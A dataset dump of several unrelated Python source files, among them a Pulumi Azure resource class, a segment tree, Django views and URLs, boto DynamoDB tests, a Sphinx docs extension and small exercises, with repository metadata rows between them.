:param pulumi.Input[str] gallery_name: The name of the Shared Application Gallery in which the Application Definition resides.
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']] publishing_profile: The publishing profile of a gallery Image Version.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if gallery_application_name is None:
raise TypeError("Missing required property 'gallery_application_name'")
__props__['gallery_application_name'] = gallery_application_name
if gallery_application_version_name is None:
raise TypeError("Missing required property 'gallery_application_version_name'")
__props__['gallery_application_version_name'] = gallery_application_version_name
if gallery_name is None:
raise TypeError("Missing required property 'gallery_name'")
__props__['gallery_name'] = gallery_name
if location is None:
raise TypeError("Missing required property 'location'")
__props__['location'] = location
if publishing_profile is None:
raise TypeError("Missing required property 'publishing_profile'")
__props__['publishing_profile'] = publishing_profile
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['replication_status'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute/latest:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190301:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20190701:GalleryApplicationVersion"), pulumi.Alias(type_="azure-nextgen:compute/v20200930:GalleryApplicationVersion")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(GalleryApplicationVersion, __self__).__init__(
'azure-nextgen:compute/v20191201:GalleryApplicationVersion',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'GalleryApplicationVersion':
"""
Get an existing GalleryApplicationVersion resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return GalleryApplicationVersion(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publishingProfile")
def publishing_profile(self) -> pulumi.Output['outputs.GalleryApplicationVersionPublishingProfileResponse']:
"""
The publishing profile of a gallery Image Version.
"""
return pulumi.get(self, "publishing_profile")
@property
@pulumi.getter(name="replicationStatus")
def replication_status(self) -> pulumi.Output['outputs.ReplicationStatusResponse']:
"""
This is the replication status of the gallery Image Version.
"""
return pulumi.get(self, "replication_status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
[
"[email protected]"
] | |
8e4baaae320644a77b9d51ae74ea221201759574
|
1825283527f5a479204708feeaf55f4ab6d1290b
|
/leetcode/segmented-tree/leon.py
|
9b86c455efa6252c088d2e4fb3ac6b44b59e8988
|
[] |
no_license
|
frankieliu/problems
|
b82c61d3328ffcc1da2cbc95712563355f5d44b5
|
911c6622448a4be041834bcab25051dd0f9209b2
|
refs/heads/master
| 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 |
HTML
|
UTF-8
|
Python
| false | false | 6,843 |
py
|
# https://github.com/yuexihan/leonLPST/blob/master/leonLPST.py
from __future__ import division
from six.moves import xrange
class LPSTree:
"""
LPSTree(n[, value=None[, reducef=None[, modulo=None]]]) -> new LPSTree
Build a new LPSTree with n elements.
If value is provided, all elements are set to value, otherwise 0.
Default reduce function is sum. Can alse be set to max or min.
If modulo is provide, modulo operation will be donw automatically.
"""
def __init__(self, n, value=None, reducef=None, modulo=None):
if n <= 0:
raise ValueError("n most be greater than 0")
self.n = n
size = 1;
while(size < n):
size *= 2
size *= 2
self.size = size
self.tree = [None] * size
self.boolset = [False] * size
self.booladd = [False] * size
self.lazyset = [None] * size
self.lazyadd = [None] * size
self.modulo = modulo
if not reducef:
reducef = sum
if reducef == sum:
self.nodef = (lambda val, n: val*n)
elif reducef == max or reducef == min:
self.nodef = (lambda val, n: val)
else:
raise ValueError("reducef can only be sum, max or min")
if self.modulo:
self.reducef = lambda x: reducef(x) % self.modulo
else:
self.reducef = reducef
if value != None:
array = [value] * n
else:
array = [0] * n
def construct(tree, array, sleft, sright, v):
if sleft+1 == sright:
tree[v] = array[sleft]
return tree[v]
smid = (sleft + sright) // 2
tree[v] = self.reducef((construct(tree, array, sleft, smid, 2*v+1),
construct(tree, array, smid, sright, 2*v+2)))
# if self.modulo:
# tree[v] %= self.modulo
# print tree
return tree[v]
construct(self.tree, array, 0, n, 0)
def __len__(self):
return self.n
def _lazypropagate(self, v, vleft, vright):
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
vmid = (vleft + vright) // 2
# print tree, v, tree[2*v+1], boolset[v], booladd[v]
if boolset[v]:
tree[2*v+1] = self.nodef(lazyset[v], vmid-vleft)
tree[2*v+2] = self.nodef(lazyset[v], vright-vmid)
if self.modulo:
tree[2*v+1] %= self.modulo
tree[2*v+2] %= self.modulo
boolset[2*v+1] = boolset[2*v+2] = True
booladd[2*v+1] = booladd[2*v+2] = False
lazyset[2*v+1] = lazyset[2*v+2] = lazyset[v]
boolset[v] = False
if booladd[v]:
tree[2*v+1] += self.nodef(lazyadd[v], vmid-vleft)
tree[2*v+2] += self.nodef(lazyadd[v], vright-vmid)
if self.modulo:
tree[2*v+1] %= self.modulo
tree[2*v+2] %= self.modulo
if booladd[2*v+1]:
lazyadd[2*v+1] += lazyadd[v]
else:
booladd[2*v+1] = True
lazyadd[2*v+1] = lazyadd[v]
if booladd[2*v+2]:
lazyadd[2*v+2] += lazyadd[v]
else:
booladd[2*v+2] = True
lazyadd[2*v+2] = lazyadd[v]
booladd[v] = False
# print tree, v, tree[2*v+1]
def get(self, start, stop):
"""
LPSTree.get(start, stop) -> value
You can assume it same as reduce(reducef, tree[start:stop]).
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _get(sleft, sright, v, vleft, vright):
# print v, start, stop, vleft, vright, tree
if sleft>=vright or sright <= vleft:
return
if sleft<=vleft and sright >= vright:
# if self.modulo:
# tree[v] %= self.modulo
return tree[v]
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
# print v, start, stop, vleft, vright, tree
return self.reducef([x for x in
(_get(sleft, sright, 2*v+1, vleft, vmid),
_get(sleft, sright, 2*v+2, vmid, vright))
if x != None])
return _get(start, stop, 0, 0, n)
def set(self, start, stop, value):
"""
LPSTRee.set(start, stop, value)
Set all elements in [start, stop) to value.
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _set(sleft, sright, v, vleft, vright, value):
# print v, start, stop, vleft, vright, value, tree
if sleft >= vright or sright <= vleft:
return
if sleft <= vleft and sright >= vright:
tree[v] = self.nodef(value, vright-vleft)
if self.modulo:
tree[v] %= self.modulo
boolset[v] = True
booladd[v] = False
lazyset[v] = value
# print v, tree, tree[v], tree[v] % self.modulo
return
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
_set(sleft, sright, 2*v+1, vleft, vmid, value)
_set(sleft, sright, 2*v+2, vmid, vright, value)
tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
# if self.modulo:
# tree[v] %= self.modulo
# print v, start, stop, vleft, vright, value, tree
_set(start, stop, 0, 0, n, value)
def add(self, start, stop, diff):
"""
LPSTRee.add(start, stop, diff)
Add diff to all elements in [start, stop).
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _add(sleft, sright, v, vleft, vright, diff):
if sleft >= vright or sright <= vleft:
return
if sleft <= vleft and sright >= vright:
tree[v] += self.nodef(diff, vright-vleft)
if self.modulo:
tree[v] %= self.modulo
if booladd[v]:
lazyadd[v] += diff
else:
booladd[v] = True
lazyadd[v] = diff
return
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
_add(sleft, sright, 2*v+1, vleft, vmid, diff)
_add(sleft, sright, 2*v+2, vmid, vright, diff)
tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
# if self.modulo:
# tree[v] %= self.modulo
_add(start, stop, 0, 0, n, diff)
def __getitem__(self, index):
return self.get(index, index+1)
def __setitem__(self, index, value):
self.set(index, index+1, value)
def __repr__(self):
return repr([self[x] for x in xrange(self.n)])
def tolist(self):
"""
LPSTree.tolist() -> a list object
Return a list containing all the elements in LPSTree.
"""
return [self[x] for x in xrange(self.n)]
if __name__ == '__main__':
tree = LPSTree(10, reducef=max)
# tree = LPSTree(10, modulo=2)
# tree = LPSTree(10)
print tree.n, tree.size
print tree.get(0, 10)
print tree[0], tree[1]
tree[9] = 20
print tree
print tree.get(0, 10)
tree.set(1,5,5)
print tree
tree.add(1, 10, 12)
print tree
tree.set(0, 3, 5)
tree.add(0, 4, 2)
print tree
tree.set(0, 10, 0)
print tree
tree.add(1, 9, -10)
print tree
print tree.get(8, 9)
tree.set(0, 3, 9)
print tree
tree = LPSTree(10, reducef=max)
print tree
# tree.set(0, 10, 0)
# help(tree.set)
tree.set(1, 9, -10)
print tree
|
[
"[email protected]"
] | |
43a228606e02826830759f5f40418f92e634af34
|
19892b65355f7661cf5e42d2f749904788c1a7d0
|
/dailyfresh/daily_fresh/utils/mixin.py
|
6174e5aba8081e3b2cf0368084ea7f0853225db5
|
[] |
no_license
|
BinXiaoEr/daily_fresh
|
35902cb6753851a14517265db3738a008610c7d8
|
d8bdc10e80b6b8e2be5f85f6a8293fb1f4695e1d
|
refs/heads/master
| 2021-07-09T16:06:34.809134 | 2020-08-04T01:51:34 | 2020-08-04T01:51:34 | 181,276,905 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 287 |
py
|
from django.contrib.auth.decorators import login_required
class LoginRequiredMixin(object):
@classmethod
def as_view(cls, **initkwargs):
# 调用父类的as_view
view = super(LoginRequiredMixin, cls).as_view(**initkwargs)
return login_required(view)
|
[
"[email protected]"
] | |
b05acce5674d36ac8d553f00d5fe010f2061fbdf
|
612325535126eaddebc230d8c27af095c8e5cc2f
|
/depot_tools/external_bin/gsutil/gsutil_4.15/gsutil/third_party/boto/tests/unit/dynamodb/test_types.py
|
e3b913d7eb4a7e8789aa9a1becd8cefa58b17d6a
|
[
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
TrellixVulnTeam/proto-quic_1V94
|
1a3a03ac7a08a494b3d4e9857b24bb8f2c2cd673
|
feee14d96ee95313f236e0f0e3ff7719246c84f7
|
refs/heads/master
| 2023-04-01T14:36:53.888576 | 2019-10-17T02:23:04 | 2019-10-17T02:23:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,427 |
py
|
#!/usr/bin/env python
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from decimal import Decimal
from tests.compat import unittest
from boto.compat import six
from boto.dynamodb import types
from boto.dynamodb.exceptions import DynamoDBNumberError
class TestDynamizer(unittest.TestCase):
def setUp(self):
pass
def test_encoding_to_dynamodb(self):
dynamizer = types.Dynamizer()
self.assertEqual(dynamizer.encode('foo'), {'S': 'foo'})
self.assertEqual(dynamizer.encode(54), {'N': '54'})
self.assertEqual(dynamizer.encode(Decimal('1.1')), {'N': '1.1'})
self.assertEqual(dynamizer.encode(set([1, 2, 3])),
{'NS': ['1', '2', '3']})
self.assertIn(dynamizer.encode(set(['foo', 'bar'])),
({'SS': ['foo', 'bar']}, {'SS': ['bar', 'foo']}))
self.assertEqual(dynamizer.encode(types.Binary(b'\x01')),
{'B': 'AQ=='})
self.assertEqual(dynamizer.encode(set([types.Binary(b'\x01')])),
{'BS': ['AQ==']})
self.assertEqual(dynamizer.encode(['foo', 54, [1]]),
{'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]})
self.assertEqual(dynamizer.encode({'foo': 'bar', 'hoge': {'sub': 1}}),
{'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}})
self.assertEqual(dynamizer.encode(None), {'NULL': True})
self.assertEqual(dynamizer.encode(False), {'BOOL': False})
def test_decoding_to_dynamodb(self):
dynamizer = types.Dynamizer()
self.assertEqual(dynamizer.decode({'S': 'foo'}), 'foo')
self.assertEqual(dynamizer.decode({'N': '54'}), 54)
self.assertEqual(dynamizer.decode({'N': '1.1'}), Decimal('1.1'))
self.assertEqual(dynamizer.decode({'NS': ['1', '2', '3']}),
set([1, 2, 3]))
self.assertEqual(dynamizer.decode({'SS': ['foo', 'bar']}),
set(['foo', 'bar']))
self.assertEqual(dynamizer.decode({'B': 'AQ=='}), types.Binary(b'\x01'))
self.assertEqual(dynamizer.decode({'BS': ['AQ==']}),
set([types.Binary(b'\x01')]))
self.assertEqual(dynamizer.decode({'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]}),
['foo', 54, [1]])
self.assertEqual(dynamizer.decode({'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}}),
{'foo': 'bar', 'hoge': {'sub': 1}})
self.assertEqual(dynamizer.decode({'NULL': True}), None)
self.assertEqual(dynamizer.decode({'BOOL': False}), False)
def test_float_conversion_errors(self):
dynamizer = types.Dynamizer()
# When supporting decimals, certain floats will work:
self.assertEqual(dynamizer.encode(1.25), {'N': '1.25'})
# And some will generate errors, which is why it's best
# to just use Decimals directly:
with self.assertRaises(DynamoDBNumberError):
dynamizer.encode(1.1)
def test_non_boolean_conversions(self):
dynamizer = types.NonBooleanDynamizer()
self.assertEqual(dynamizer.encode(True), {'N': '1'})
def test_lossy_float_conversions(self):
dynamizer = types.LossyFloatDynamizer()
# Just testing the differences here, specifically float conversions:
self.assertEqual(dynamizer.encode(1.1), {'N': '1.1'})
self.assertEqual(dynamizer.decode({'N': '1.1'}), 1.1)
self.assertEqual(dynamizer.encode(set([1.1])),
{'NS': ['1.1']})
self.assertEqual(dynamizer.decode({'NS': ['1.1', '2.2', '3.3']}),
set([1.1, 2.2, 3.3]))
class TestBinary(unittest.TestCase):
def test_good_input(self):
data = types.Binary(b'\x01')
self.assertEqual(b'\x01', data)
self.assertEqual(b'\x01', bytes(data))
def test_non_ascii_good_input(self):
# Binary data that is out of ASCII range
data = types.Binary(b'\x88')
self.assertEqual(b'\x88', data)
self.assertEqual(b'\x88', bytes(data))
@unittest.skipUnless(six.PY2, "Python 2 only")
def test_bad_input(self):
with self.assertRaises(TypeError):
types.Binary(1)
@unittest.skipUnless(six.PY3, "Python 3 only")
def test_bytes_input(self):
data = types.Binary(1)
self.assertEqual(data, b'\x00')
self.assertEqual(data.value, b'\x00')
@unittest.skipUnless(six.PY2, "Python 2 only")
def test_unicode_py2(self):
# It's dirty. But remains for backward compatibility.
data = types.Binary(u'\x01')
self.assertEqual(data, b'\x01')
self.assertEqual(bytes(data), b'\x01')
# Delegate to built-in b'\x01' == u'\x01'
# In Python 2.x these are considered equal
self.assertEqual(data, u'\x01')
# Check that the value field is of type bytes
self.assertEqual(type(data.value), bytes)
@unittest.skipUnless(six.PY3, "Python 3 only")
def test_unicode_py3(self):
with self.assertRaises(TypeError):
types.Binary(u'\x01')
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
7321ac8c981ab9abb728e9c05fe1a2576ef0d878
|
3c327aa333bbeafacb8d5bd253814776ffcd0012
|
/df_user/urls.py
|
bf6fcb54488289e42e7484712a3e096f56b612be
|
[] |
no_license
|
1635848644/shopping
|
c5d0a1dd2eb5716ece76045d6c2c261ca0f4db18
|
d820e828eeed3911ea7741e4f11f4c6d83e993c6
|
refs/heads/master
| 2023-04-07T20:12:30.382805 | 2018-10-05T15:08:40 | 2018-10-05T15:08:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 405 |
py
|
#coding=utf-8
from django.conf.urls import url
from df_user import views
urlpatterns=[
url('register/',views.register),
url('login/',views.login),
url('logout/',views.logout),
url('addHarvsetAddress/',views.addHarvsetAddress),
url('user_center_info/',views.user_center_info),
url('user_center_order/',views.user_center_order),
url('user_center_site/',views.user_center_site),
]
|
[
"[email protected]"
] | |
8fd82a02b96ef6922c7ccd498e793df6876f3f49
|
46c2418ecfcf3c7034a267364185208a665be583
|
/edb/tools/docs/cli.py
|
2c9295564c14536c42a30b9de2055cc410bdcb02
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
jankeromnes/edgedb
|
3434549fb0731632ed7adb7fcb329480dee50d91
|
40ea3317fe5bfec76d7b46f7b706a4cb8a0d9f94
|
refs/heads/master
| 2022-02-24T04:56:19.238048 | 2019-05-10T12:24:40 | 2019-06-17T10:29:09 | 185,984,093 | 0 | 0 |
Apache-2.0
| 2022-01-28T09:00:32 | 2019-05-10T12:24:55 |
Python
|
UTF-8
|
Python
| false | false | 1,466 |
py
|
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2018-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from edb.edgeql.pygments import EdgeQLLexer
from sphinx import domains as s_domains
from sphinx.directives import code as s_code
from . import shared
class CLISynopsisDirective(s_code.CodeBlock):
has_content = True
optional_arguments = 0
required_arguments = 0
option_spec = {}
def run(self):
self.arguments = ['cli-synopsis']
return super().run()
class CLIDomain(s_domains.Domain):
name = "cli"
label = "Command Line Interface"
directives = {
'synopsis': CLISynopsisDirective,
}
def setup_domain(app):
app.add_lexer("cli", EdgeQLLexer())
app.add_lexer("cli-synopsis", EdgeQLLexer())
app.add_role(
'cli:synopsis',
shared.InlineCodeRole('cli-synopsis'))
app.add_domain(CLIDomain)
|
[
"[email protected]"
] | |
81b968c9d9e14ff5772ae28bead91e71f66173d8
|
50e2012ecea8307e278d1132ca0094adb940aff2
|
/lib/review/my_process/my_multiprocessing.py
|
a299b8a3185df0bb568f1c9bc93484f95d15cfcb
|
[] |
no_license
|
Lewescaiyong/my_library
|
6689cae2db4aaa980b4bd5ed9f21691eefbff2fe
|
35d0d29097823ccef74fa29ca8756a7f59ceeb78
|
refs/heads/master
| 2020-11-25T09:20:56.484275 | 2019-12-17T10:58:20 | 2019-12-17T10:58:20 | 228,593,219 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 182 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
from multiprocessing.dummy import Pool
pool1 = multiprocessing.Pool()
pool2 = Pool()
pool1.map()
pool2.map()
|
[
"[email protected]"
] | |
1308c8f92d220ac7b01c451288da34696bcbe3f8
|
c52ea8af6a4d3c32a0557c39d683a4d01b2188db
|
/ch10_dash_cytoscape_basic/layout/dash_cyto_grid_option_curve_style.py
|
00701dcffe65b44108634f361e1dafb4d3efea61
|
[
"MIT"
] |
permissive
|
plotly-dash-book/plotly-dash-book
|
dcde031766d17adf6fc670c8aec9c8d4e267eeb7
|
cc54f7ac6066a741f733facbd002222a87746e02
|
refs/heads/master
| 2022-06-27T02:46:25.502190 | 2022-06-08T03:21:23 | 2022-06-08T03:21:23 | 197,512,189 | 30 | 18 |
MIT
| 2021-05-31T04:47:36 | 2019-07-18T04:36:50 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,531 |
py
|
import dash
import dash_cytoscape as cyto
import dash_html_components as html
app = dash.Dash(__name__)
# ノードを17個定義
nodes = [{"data": {"id": x, "label": f"{x}"}} for x in range(17)]
# エッジを定義
edges = [
{"data": {"source": 0, "target": 1}},
{"data": {"source": 0, "target": 2}},
{"data": {"source": 0, "target": 3}},
{"data": {"source": 0, "target": 4}},
{"data": {"source": 2, "target": 3}},
{"data": {"source": 3, "target": 4}},
{"data": {"source": 4, "target": 5}},
{"data": {"source": 5, "target": 1}},
{"data": {"source": 1, "target": 6}},
{"data": {"source": 2, "target": 7}},
{"data": {"source": 2, "target": 8}},
{"data": {"source": 3, "target": 9}},
{"data": {"source": 4, "target": 10}},
{"data": {"source": 4, "target": 11}},
{"data": {"source": 4, "target": 12}},
{"data": {"source": 5, "target": 13}},
{"data": {"source": 5, "target": 14}},
{"data": {"source": 6, "target": 15}},
]
elements = nodes + edges
cyto_compo = cyto.Cytoscape(
id="dash_cyto_layout",
style={"width": "400px", "height": "400px"},
layout={"name": "grid", "rows": 3, "columns": 6},
elements=elements,
stylesheet=[
{"selector": "node", "style": {"content": "data(label)"}},
# エッジのカーブのスタイルを曲線にする
{"selector": "edge", "style": {"curve-style": "unbundled-bezier"}},
],
)
app.layout = html.Div([cyto_compo])
if __name__ == "__main__":
app.run_server(debug=True)
|
[
"[email protected]"
] | |
805e778f090eb8a26dac37e6725197e259091f56
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/KLke67efuam6ajLrt_2.py
|
1dc365bb23d969b5f0f0d4e85f8e8ff90a1cf504
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,765 |
py
|
"""
An **out-shuffle** , also known as an _out faro shuffle_ or a _perfect
shuffle_ , is a controlled method for shuffling playing cards. It is performed
by splitting the deck into two equal halves and interleaving them together
perfectly, with the condition that the top card of the deck remains in place.
Using an array to represent a deck of cards, an out-shuffle looks like:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
// Card 1 remains in the first position.
If we repeat the process, the deck eventually returns to original order.
Shuffle 1:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
Shuffle 2:
[1, 5, 2, 6, 3, 7, 4, 8] ➞ [1, 3, 5, 7, 2, 4, 6, 8]
Shuffle 3:
[1, 3, 5, 7, 2, 4, 6, 8] ➞ [1, 2, 3, 4, 5, 6, 7, 8]
// Back where we started.
Write a function that takes a positive even integer representing the number of
the cards in a deck, and returns the number of out-shuffles required to return
the deck to its original order.
### Examples
shuffle_count(8) ➞ 3
shuffle_count(14) ➞ 12
shuffle_count(52) ➞ 8
### Notes
* The number of cards is always **even** and **greater than one**. Thus, the smallest possible deck size is **two**.
* A **recursive** version of this challenge can be found via this [link](https://edabit.com/challenge/EXNAxFGgDDtE3SbQf).
"""
def shuffle_count(num):
half = num // 2
deck = list(range(num))
left, right = deck[:half], deck[half:]
deck_s = [right[i // 2] if i % 2 else left[i // 2] for i in range(num)]
count = 1
while deck_s != deck:
left, right = deck_s[:half], deck_s[half:]
deck_s = [right[i // 2] if i % 2 else left[i // 2] for i in range(num)]
count += 1
return count
|
[
"[email protected]"
] | |
49b7c6233cb3d031e79f2710167aae956de76e29
|
55a281d728541773e6eda896599c0cc48dfe5156
|
/Advanced/venv/Scripts/easy_install-script.py
|
8e473e4d78117e10d75b080582317f8367fd492a
|
[] |
no_license
|
dhariskov/python-advanced
|
c0bebd937f3849dd62ae2834cbdf9f8100b2bb56
|
4725070c960d3c234ed2f20ff2156e2f89514a02
|
refs/heads/master
| 2022-12-04T22:40:18.485552 | 2020-08-28T08:29:25 | 2020-08-28T08:29:25 | 288,775,775 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 450 |
py
|
#!C:\Users\Acer\PycharmProjects\Advanced\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
|
[
"[email protected]"
] | |
f636068a81116528616e1f63c07c412447c94e49
|
c5be6a92f216957d340474b58507606a38c10f5f
|
/course-files/tutorials/tutorial04/answers/drawings/d5.py
|
e0e46a2f538962b9b15a80780794e0fa647bfa31
|
[] |
no_license
|
eecs110/winter2019
|
0b314c35e886b8099368ed7dfd51b707ab73c0c2
|
f4107207ca1c9c10b78bdbb74fd82410b00ee363
|
refs/heads/master
| 2020-04-11T10:09:28.100445 | 2019-03-21T18:00:25 | 2019-03-21T18:00:25 | 161,705,160 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 860 |
py
|
from tkinter import Canvas, Tk
import random
import shapes
import math
gui = Tk()
gui.title('Circle')
canvas = Canvas(gui, width=500, height=500, background='#FFFFFF')
canvas.pack()
########################## YOUR CODE BELOW THIS LINE ##############################
center_x = 250
center_y = 250
distance_from_center = 50
radius_of_individual_circle = 100
num_circles = 30
for i in range(num_circles):
# calculate new position of x and y
radians = 360 / num_circles * i * (math.pi / 180)
dy = distance_from_center * math.sin(radians)
dx = distance_from_center * math.cos(radians)
x = center_x + dx
y = center_y - dy
shapes.make_circle(canvas, (x, y), radius_of_individual_circle, color=None, outline='black', stroke_width=1)
########################## YOUR CODE ABOVE THIS LINE ##############################
canvas.mainloop()
|
[
"[email protected]"
] | |
0bc96e095f2069bc9811ef311b2dee119285ae92
|
9c88b828b783e23b50186a2cbba2c08610d8d10d
|
/espressodb/documentation/__init__.py
|
c16020e168c1d82085be018508a3cd3600a84a63
|
[
"BSD-3-Clause"
] |
permissive
|
remram44/espressodb
|
9a51219c0e7ec6e4c400578d02b97ef95024ba1e
|
5aad7222ab81c0f1694b51171e5d197dbcc8a65f
|
refs/heads/master
| 2020-12-08T06:07:43.736419 | 2020-01-12T20:31:20 | 2020-01-12T20:31:20 | 232,909,755 | 0 | 0 |
BSD-3-Clause
| 2020-01-09T21:29:09 | 2020-01-09T21:29:08 | null |
UTF-8
|
Python
| false | false | 170 |
py
|
"""The documentations module provides a web page which summarizes the implemented models
which derive from the EspressoDB :class:`espressodb.base.models.Base` class.
"""
|
[
"[email protected]"
] | |
0587480993283923fc28a800af3f56fc5d43a1d5
|
34e3147447875b491bd1b50c915f8848ead80792
|
/uncertainty/constants.py
|
f19f8cdc91913b47521873fbed92985edbf59ce3
|
[
"MIT"
] |
permissive
|
meyersbs/uncertainty
|
680f275ded6aad63012a7ca781d1cf455c66f226
|
c12842cda7bea2d604bb9227a6c0baba9830b6fe
|
refs/heads/master
| 2023-07-20T09:00:25.876780 | 2023-07-07T18:17:07 | 2023-07-07T18:17:07 | 87,837,406 | 19 | 5 |
MIT
